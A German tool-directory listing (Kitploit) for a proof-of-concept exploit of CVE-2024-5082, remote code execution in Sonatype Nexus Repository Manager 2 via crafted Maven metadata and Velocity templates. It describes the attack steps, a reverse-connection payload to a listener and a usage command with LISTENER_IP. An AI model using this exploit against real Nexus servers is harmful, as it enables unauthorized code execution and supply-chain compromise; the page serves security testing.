Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-5082 — Proof-of-Concept-Exploit für CVE-2024-5082, eine Remote-Codeausführungsschwachstelle in Sonatype Nexus Repository Manager 2 über manipulierte Maven-Artefakte und Velocity-Template-Verarbeitung. | Kitploit
Tools/GitHubGitHub/h4mr3r/cve-2024-5082
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLieferkettensicherheitPayload-Entwicklung
GitHubh4mr3r/cve-2024-5082

CVE-2024-5082

Proof-of-Concept-Exploit für CVE-2024-5082, eine Remote-Codeausführungsschwachstelle in Sonatype Nexus Repository Manager 2 über manipulierte Maven-Artefakte und Velocity-Template-Verarbeitung.

Repository anzeigen
12vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Übersicht

Dieses Repository enthält einen Python Proof of Concept für CVE-2024-5082, eine Schwachstelle zur Remote-Code-Ausführung in Sonatype Nexus Repository Manager 2.

Die Schwachstelle erlaubt einem Benutzer mit ausreichenden Berechtigungen, ein speziell präpariertes Maven-Artefakt zu veröffentlichen und es für die Verarbeitung durch den Velocity-Content-Generator zu markieren. Wenn das Artefakt abgerufen wird, wird die eingebettete Velocity-Vorlage von Nexus ausgewertet und kann einen Befehl im Sicherheitskontext der Nexus-JVM ausführen.

Laut Sonatype:

  • betroffene Versionen umfassen Nexus Repository Manager 2.x bis einschließlich 2.15.1;
  • das Problem wurde in 2.15.2 behoben;
  • Nexus Repository 2 hat am 30. Juni 2025 das Ende seiner Lebensdauer erreicht und sollte zu Nexus Repository 3 migriert werden.

Wichtige Klarstellung zum Umfang

Der Befehl wird auf dem Nexus-Repository-Host ausgeführt.

Das Herunterladen des betroffenen Artefakts von einem Build-Server, Anwendungsserver oder Entwickler-Arbeitsplatz führt für sich genommen nicht zur Ausführung des eingebetteten Befehls auf dem konsumierenden System. Eine Kompromittierung eines Repository-Managers kann jedoch ein breiteres Lieferkettenrisiko schaffen, falls ein Angreifer später vertrauenswürdige Artefakte, Build-Eingaben, Anmeldeinformationen oder die Repository-Konfiguration modifiziert.

So funktioniert der PoC

Das Skript:

  1. Erzeugt einen eindeutigen Marker-Pfad unter einem Maven-ähnlichen Namensraum.
  2. Lädt eine präparierte maven-metadata.xml-Datei in ein ausgewähltes gehostetes Repository hoch.
  • Aktualisiert die entsprechenden Nexus-Attribute, sodass der Content-Generator auf velocity gesetzt wird.
  • Ruft das hochgeladene Artefakt ab, wodurch Nexus die Vorlage verarbeitet.
  • Versucht, das hochgeladene Marker-Artefakt während der Bereinigung zu entfernen.
  • Die bereitgestellte Nutzlast erstellt eine ausgehende TCP-Verbindung vom Nexus-Host zur konfigurierten Listener-Adresse.

    Authentifizierung und Berechtigungen

    Das aktuelle Skript verwendet HTTP-Basisauthentifizierung und erfordert:

    • einen gültigen Nexus-Benutzernamen und ein gültiges Passwort;
    • die Berechtigung zum Erstellen oder Aktualisieren von Inhalten im ausgewählten Repository;
    • die Berechtigung für die vom PoC verwendete Attributaktualisierung.

    Verwendung

    root@kitploit:~
    python3 cve_2024_5082.py \\
      --base-url https://nexus.example.test/nexus \\
      --repository security-test-snapshots \\
      --username test-user \\
      --password 'REDACTED' \\
      --lhost LISTENER_IP \\
      --lport 8000
    
    Tool herunterladen